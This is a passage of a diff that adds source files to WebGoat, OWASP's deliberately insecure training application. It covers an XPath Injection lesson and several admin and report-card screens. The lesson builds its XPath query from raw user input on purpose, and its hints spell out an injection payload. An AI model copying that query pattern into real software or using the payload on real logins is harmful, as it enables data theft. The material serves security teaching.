+
+	    String username = s.getParser().getRawParameter(USERNAME, "");
+	    if (username == null || username.length() == 0)
+	    {
+		ec.addElement(new P().addElement(new StringElement(
+			"Username is a required field")));
+		return ec;
+	    }
+
+	    String password = s.getParser().getRawParameter(PASSWORD, "");
+	    if (password == null || password.length() == 0)
+	    {
+		ec.addElement(new P().addElement(new StringElement(
+			"Password is a required field")));
+		return ec;
+	    }
+
+	    String dir = s.getContext().getRealPath(
+		    "/lessons/XPATHInjection/EmployeesData.xml");
+	    File d = new File(dir);
+	    XPathFactory factory = XPathFactory.newInstance();
+	    XPath xPath = factory.newXPath();
+	    InputSource inputSource = new InputSource(new FileInputStream(d));
+	    String expression = "/employees/employee[loginID/text()='"
+		    + username + "' and passwd/text()='" + password + "']";
+	    nodes = (NodeList) xPath.evaluate(expression, inputSource,
+		    XPathConstants.NODESET);
+	    int nodesLength = nodes.getLength();
+
+	    Table t2 = null;
+	    if (nodesLength > 0)
+	    {
+		t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+			1).setWidth("90%").setAlign("center");
+		tr = new TR();
+		tr.setBgColor(HtmlColor.GRAY);
+		tr.addElement(new TD().addElement("Username"));
+		tr.addElement(new TD().addElement("Account No."));
+		tr.addElement(new TD().addElement("Salary"));
+		t2.addElement(tr);
+	    }
+
+	    for (int i = 0; i < nodesLength; i++)
+	    {
+		Node node = nodes.item(i);
+		String[] arrTokens = node.getTextContent()
+			.split("[\\t\\s\\n]+");
+
+		tr = new TR();
+		tr.addElement(new TD().addElement(arrTokens[1]));
+		tr.addElement(new TD().addElement(arrTokens[2]));
+		tr.addElement(new TD().addElement(arrTokens[4]));
+		t2.addElement(tr);
+
+	    }
+	    if (nodes.getLength() > 1)
+	    {
+		makeSuccess(s);
+	    }
+	    if (t2 != null)
+	    {
+		ec.addElement(new PRE());
+		ec.addElement(t2);
+	    }
+
+	}
+	catch (IOException e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	catch (IllegalArgumentException e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	catch (XPathExpressionException e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return ec;
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+
+	return Category.INJECTION;
+    }
+
+
+    protected boolean getDefaultHidden()
+    {
+	// TODO Auto-generated method stub
+	return false;
+    }
+
+
+    protected Integer getDefaultRanking()
+    {
+
+	return DEFAULT_RANKING;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	// TODO Auto-generated method stub
+	List<String> hints = new ArrayList<String>();
+	hints.add("Remember that the data is stored in XML format.");
+	hints.add("The system is using XPath to query.");
+	hints
+		.add("XPath is almost the same thing as SQL, the same hacking techniques apply too.");
+	hints
+		.add("Try username: Smith' or 1=1 or 'a'='a and a password: anything ");
+	return hints;
+    }
+
+
+    public String getTitle()
+    {
+
+	return "XPATH Injection";
+    }
+
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java
new file mode 100644
index 000000000..95951a940
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java
@@ -0,0 +1,104 @@
+package org.owasp.webgoat.lessons.admin;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.session.Screen;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public abstract class AdminScreen extends Screen
+{
+
+    /**
+     *  Description of the Field
+     */
+    protected String query = null;
+
+
+    /**
+     *  Constructor for the AdminScreen object
+     *
+     * @param  s  Description of the Parameter
+     * @param  q  Description of the Parameter
+     */
+    public AdminScreen(WebSession s, String q)
+    {
+	setQuery(q);
+
+	// setupAdmin(s);  FIXME: what was this supposed to do?
+    }
+
+
+    /**
+     *  Constructor for the AdminScreen object
+     *
+     * @param  s  Description of the Parameter
+     */
+    public AdminScreen(WebSession s)
+    {}
+
+
+    /**
+     *  Constructor for the AdminScreen object
+     */
+    public AdminScreen()
+    {}
+
+
+    /**
+     *  Gets the title attribute of the AdminScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Admin Information");
+    }
+
+
+    public String getRole()
+    {
+	return AbstractLesson.ADMIN_ROLE;
+    }
+
+
+    /**
+     *  Sets the query attribute of the AdminScreen object
+     *
+     * @param  q  The new query value
+     */
+    public void setQuery(String q)
+    {
+	query = q;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java
new file mode 100644
index 000000000..7a19cab7c
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java
@@ -0,0 +1,128 @@
+package org.owasp.webgoat.lessons.admin;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.Statement;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.LessonAdapter;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class ProductsAdminScreen extends LessonAdapter
+{
+
+    private final static String QUERY = "SELECT * FROM product_system_data";
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    Statement statement = connection.createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement.executeQuery(QUERY);
+
+	    if (results != null)
+	    {
+		makeSuccess(s);
+		ResultSetMetaData resultsMetaData = results.getMetaData();
+		ec.addElement(DatabaseUtilities.writeTable(results,
+			resultsMetaData));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the ProductsAdminScreen object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.ADMIN_FUNCTIONS;
+    }
+
+
+    /**
+     *  Gets the role attribute of the ProductsAdminScreen object
+     *
+     * @return    The role value
+     */
+    public String getRole()
+    {
+	return HACKED_ADMIN_ROLE;
+    }
+
+
+    /**
+     *  Gets the title attribute of the ProductsAdminScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Product Information");
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java
new file mode 100644
index 000000000..c5da5e124
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java
@@ -0,0 +1,166 @@
+package org.owasp.webgoat.lessons.admin;
+
+import java.sql.Connection;
+import org.owasp.webgoat.lessons.*;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.*;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class RefreshDBScreen extends LessonAdapter
+{
+
+    private final static String REFRESH = "Refresh";
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    boolean refresh = s.getParser().getBooleanParameter(REFRESH, false);
+
+	    if (refresh)
+	    {
+		refreshDB(s);
+		ec.addElement(new StringElement(
+			"Successfully refreshed the database."));
+	    }
+	    else
+	    {
+		Element label = new StringElement("Refresh the database? ");
+		A link1 = ECSFactory.makeLink("Yes", REFRESH, true);
+		A link2 = ECSFactory.makeLink("No", REFRESH, false);
+		TD td1 = new TD().addElement(label);
+		TD td2 = new TD().addElement(link1);
+		TD td3 = new TD().addElement(link2);
+		TR row = new TR().addElement(td1).addElement(td2).addElement(
+			td3);
+		Table t = new Table().setCellSpacing(40).setWidth("50%");
+
+		if (s.isColor())
+		{
+		    t.setBorder(1);
+		}
+
+		t.addElement(row);
+		ec.addElement(t);
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the RefreshDBScreen object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.ADMIN_FUNCTIONS;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the role attribute of the RefreshDBScreen object
+     *
+     * @return    The role value
+     */
+    public String getRole()
+    {
+	return ADMIN_ROLE;
+    }
+
+
+    /**
+     *  Gets the title attribute of the RefreshDBScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Refresh Database");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     */
+    public void refreshDB(WebSession s)
+    {
+	try
+	{
+		Connection connection = DatabaseUtilities.getConnection(s);
+
+	    CreateDB db = new CreateDB();
+	    db.makeDB(connection);
+	    System.out.println("Successfully refreshed the database.");
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error refreshing database "
+		    + this.getClass().getName());
+	    e.printStackTrace();
+	}
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java
new file mode 100644
index 000000000..7381fd848
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java
@@ -0,0 +1,321 @@
+package org.owasp.webgoat.lessons.admin;
+
+import java.util.Iterator;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.HtmlColor;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H2;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.LessonAdapter;
+import org.owasp.webgoat.session.LessonTracker;
+import org.owasp.webgoat.session.Screen;
+import org.owasp.webgoat.session.UserTracker;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class ReportCardScreen extends LessonAdapter
+{
+
+    /**
+     *  Description of the Field
+     */
+    protected final static String USERNAME = "Username";
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	String user = null;
+
+	try
+	{
+	    if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN))
+	    {
+		user = s.getParser().getRawParameter(USERNAME);
+	    }
+	    else
+	    {
+		user = s.getUserName();
+	    }
+	}
+	catch (Exception e)
+	{}
+
+	if (user == null)
+	{
+	    user = s.getUserName();
+	}
+
+	ec.addElement(makeFeedback(s));
+	ec.addElement(makeReportCard(s, user));
+
+	return ec;
+    }
+
+
+    private Element makeFeedback(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement(new Center(new StringElement(
+		"Comments and suggestions are welcome. "
+			+ getWebgoatContext().getFeedbackAddress())));
+
+	return ec;
+    }
+
+
+    /**
+     *  Gets the category attribute of the UserAdminScreen object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.ADMIN_FUNCTIONS;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the role attribute of the UserAdminScreen object
+     *
+     * @return    The role value
+     */
+    public String getRole()
+    {
+	return USER_ROLE;
+    }
+
+
+    /**
+     *  Gets the title attribute of the UserAdminScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Report Card");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  screen  Description of the Parameter
+     * @param  s       Description of the Parameter
+     * @param  user    Description of the Parameter
+     * @return         Description of the Return Value
+     */
+    private TR makeLessonRow(WebSession s, String user, Screen screen)
+    {
+	LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(
+		s, user, screen);
+	TR tr = new TR();
+	if (lessonTracker.getCompleted())
+	{
+	    tr.setBgColor(HtmlColor.LIGHTGREEN);
+	}
+	else if (lessonTracker.getNumVisits() == 0)
+	{
+	    tr.setBgColor(HtmlColor.LIGHTBLUE);
+	}
+	else if (!lessonTracker.getCompleted()
+		&& lessonTracker.getNumVisits() > 10)
+	{
+	    tr.setBgColor(HtmlColor.RED);
+	}
+	else
+	{
+	    tr.setBgColor(HtmlColor.YELLOW);
+	}
+	tr.addElement(new TD().addElement(screen.getTitle()));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		lessonTracker.getCompleted() ? "Y" : "N"));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		Integer.toString(lessonTracker.getNumVisits())));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		Integer.toString(lessonTracker.getMaxHintLevel())));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		lessonTracker.getViewedCookies() ? "Y" : "N"));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		lessonTracker.getViewedHtml() ? "Y" : "N"));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		lessonTracker.getViewedLessonPlan() ? "Y" : "N"));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		lessonTracker.getViewedParameters() ? "Y" : "N"));
+	tr.addElement(new TD().setAlign("CENTER").addElement(
+		lessonTracker.getViewedSource() ? "Y" : "N"));
+	return tr;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeMessages(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s     Description of the Parameter
+     * @param  user  Description of the Parameter
+     * @return       Description of the Return Value
+     */
+    public Element makeReportCard(WebSession s, String user)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec.addElement(makeUser(s, user));
+	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1);
+
+	if (s.isColor())
+	{
+	    t.setBorder(1);
+	}
+	TR tr = new TR();
+	t.addElement(makeUserHeaderRow());
+
+	// These are all the user lesson
+	tr = new TR();
+	tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement(
+		"Normal user lessons"));
+	t.addElement(tr);
+	for (Iterator lessonIter = s.getCourse().getLessons(s,
+		AbstractLesson.USER_ROLE).iterator(); lessonIter.hasNext();)
+	{
+	    Screen screen = (Screen) lessonIter.next();
+	    t.addElement(makeLessonRow(s, user, screen));
+	}
+
+	// The user figured out there was a hackable admin acocunt
+	tr = new TR();
+	tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement(
+		"Hackable Admin Screens"));
+	t.addElement(tr);
+	for (Iterator lessonIter = s.getCourse().getLessons(s,
+		AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter
+		.hasNext();)
+	{
+	    Screen screen = (Screen) lessonIter.next();
+	    t.addElement(makeLessonRow(s, user, screen));
+	}
+
+	// The user figured out how to actually hack the admin acocunt
+	tr = new TR();
+	tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement(
+		"Actual Admin Screens"));
+	t.addElement(tr);
+	for (Iterator lessonIter = s.getCourse().getLessons(s,
+		AbstractLesson.ADMIN_ROLE).iterator(); lessonIter.hasNext();)
+	{
+	    Screen screen = (Screen) lessonIter.next();
+	    t.addElement(makeLessonRow(s, user, screen));
+	}
+
+	ec.addElement(t);
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s     Description of the Parameter
+     * @param  user  Description of the Parameter
+     * @return       Description of the Return Value
+     */
+    protected Element makeUser(WebSession s, String user)
+    {
+	H2 h2 = new H2();
+	// FIXME: The session is the current session, not the session of the user we are reporting.
+	//String type = s.isAdmin() ? " [Administrative User]" : s.isHackedAdmin() ? " [Normal User - Hacked Admin Access]" : " [Normal User]";
+	String type = "";
+	h2.addElement(new StringElement("Results for: " + user + type));
+	return h2;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @return    Description of the Return Value
+     */
+    private TR makeUserHeaderRow()
+    {
+	TR tr = new TR();
+
+	tr.addElement(new TH("Lesson"));
+	tr.addElement(new TH("Complete"));
+	tr.addElement(new TH("Visits"));
+	tr.addElement(new TH("Hints"));
+	tr.addElement(new TH("Cookies"));
+	tr.addElement(new TH("HTML"));
+	tr.addElement(new TH("LessonPlan"));
+	tr.addElement(new TH("Parameters"));
+	tr.addElement(new TH("Source"));
+
+	return tr;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java
new file mode 100644
index 000000000..1747a5ff0
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java
@@ -0,0 +1,337 @@
+package org.owasp.webgoat.lessons.admin;
+
+import java.util.Enumeration;
+import java.util.Iterator;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.HtmlColor;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.LessonAdapter;
+import org.owasp.webgoat.session.LessonTracker;
+import org.owasp.webgoat.session.Screen;
+import org.owasp.webgoat.session.UserTracker;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce mayhew <a href="http://code.google.com">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class SummaryReportCardScreen extends LessonAdapter
+{
+
+    private int totalUsersNormalComplete = 0;
+
+    private int totalUsersAdminComplete = 0;
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	String selectedUser = null;
+
+	try
+	{
+	    if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN))
+	    {
+		Enumeration e = s.getParser().getParameterNames();
+
+		while (e.hasMoreElements())
+		{
+		    String key = (String) e.nextElement();
+		    if (key.startsWith("View_"))
+		    {
+			selectedUser = key.substring("View_".length());
+			ReportCardScreen reportCard = new ReportCardScreen();
+			return reportCard.makeReportCard(s, selectedUser);
+		    }
+		    if (key.startsWith("Delete_"))
+		    {
+			selectedUser = key.substring("Delete_".length());
+			deleteUser(selectedUser);
+		    }
+		}
+	    }
+	}
+	catch (Exception e)
+	{
+	    e.printStackTrace();
+	}
+
+	ec.addElement(new Center().addElement(makeSummary(s)));
+
+	ec.addElement(new P());
+
+	Table t = new Table().setCellSpacing(0).setCellPadding(4).setBorder(1)
+		.setWidth("100%");
+	if (s.isColor())
+	{
+	    t.setBorder(1);
+	}
+	t.addElement(makeUserSummaryHeader());
+
+	for (Iterator<String> userIter = UserTracker.instance().getAllUsers(
+		WebSession.WEBGOAT_USER).iterator(); userIter.hasNext();)
+	{
+
+	    String user = userIter.next();
+	    t.addElement(makeUserSummaryRow(s, user));
+	}
+
+	ec.addElement(new Center().addElement(t));
+
+	return ec;
+    }
+
+
+    protected Element makeSummary(WebSession s)
+    {
+	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		.setWidth("100%");
+	if (s.isColor())
+	{
+	    t.setBorder(1);
+	}
+	TR tr = new TR();
+	//tr.addElement( new TH().addElement( "Summary").setColSpan(1));
+	//t.addElement( tr );
+
+	tr = new TR();
+	tr.addElement(new TD().setWidth("60%").addElement(
+		"Total number of users"));
+	tr.addElement(new TD().setAlign("LEFT").addElement(
+		Integer.toString(UserTracker.instance().getAllUsers(
+			WebSession.WEBGOAT_USER).size())));
+	t.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD().setWidth("60%").addElement(
+		"Total number of users that completed all normal lessons"));
+	tr.addElement(new TD().setAlign("LEFT").addElement(
+		Integer.toString(totalUsersNormalComplete)));
+	t.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD().setWidth("60%").addElement(
+		"Total number of users that completed all admin lessons"));
+	tr.addElement(new TD().setAlign("LEFT").addElement(
+		Integer.toString(totalUsersAdminComplete)));
+	t.addElement(tr);
+	return t;
+    }
+
+
+    private void deleteUser(String user)
+    {
+	UserTracker.instance().deleteUser(user);
+    }
+
+
+    /**
+     *  Gets the category attribute of the UserAdminScreen object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.ADMIN_FUNCTIONS;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the role attribute of the UserAdminScreen object
+     *
+     * @return    The role value
+     */
+    public String getRole()
+    {
+	return ADMIN_ROLE;
+    }
+
+
+    /**
+     *  Gets the title attribute of the UserAdminScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Summary Report Card");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeMessages(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	return (ec);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @return    Description of the Return Value
+     */
+    protected Element makeUserSummaryHeader()
+    {
+	TR tr = new TR();
+
+	tr.addElement(new TH("User Name"));
+	tr.addElement(new TH("Normal Complete"));
+	tr.addElement(new TH("Admin Complete"));
+	tr.addElement(new TH("View"));
+	tr.addElement(new TH("Delete"));
+
+	return tr;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s     Description of the Parameter
+     * @param  user  Description of the Parameter
+     * @return       Description of the Return Value
+     */
+    protected Element makeUserSummaryRow(WebSession s, String user)
+    {
+	TR tr = new TR();
+
+	tr.addElement(new TD().setAlign("LEFT").addElement(user));
+	int lessonCount = 0;
+	int passedCount = 0;
+	boolean normalComplete = false;
+	boolean adminComplete = false;
+
+	for (Iterator lessonIter = s.getCourse().getLessons(s,
+		AbstractLesson.USER_ROLE).iterator(); lessonIter.hasNext();)
+	{
+	    lessonCount++;
+	    Screen screen = (Screen) lessonIter.next();
+
+	    LessonTracker lessonTracker = UserTracker.instance()
+		    .getLessonTracker(s, user, screen);
+	    if (lessonTracker.getCompleted())
+	    {
+		passedCount++;
+	    }
+	}
+	if (lessonCount == passedCount)
+	{
+	    normalComplete = true;
+	    totalUsersNormalComplete++;
+	}
+	String text = Integer.toString(passedCount) + " of "
+		+ Integer.toString(lessonCount);
+	tr.addElement(new TD().setAlign("CENTER").addElement(text));
+
+	lessonCount = 0;
+	passedCount = 0;
+	for (Iterator lessonIter = s.getCourse().getLessons(s,
+		AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter
+		.hasNext();)
+	{
+	    lessonCount++;
+	    Screen screen = (Screen) lessonIter.next();
+
+	    LessonTracker lessonTracker = UserTracker.instance()
+		    .getLessonTracker(s, user, screen);
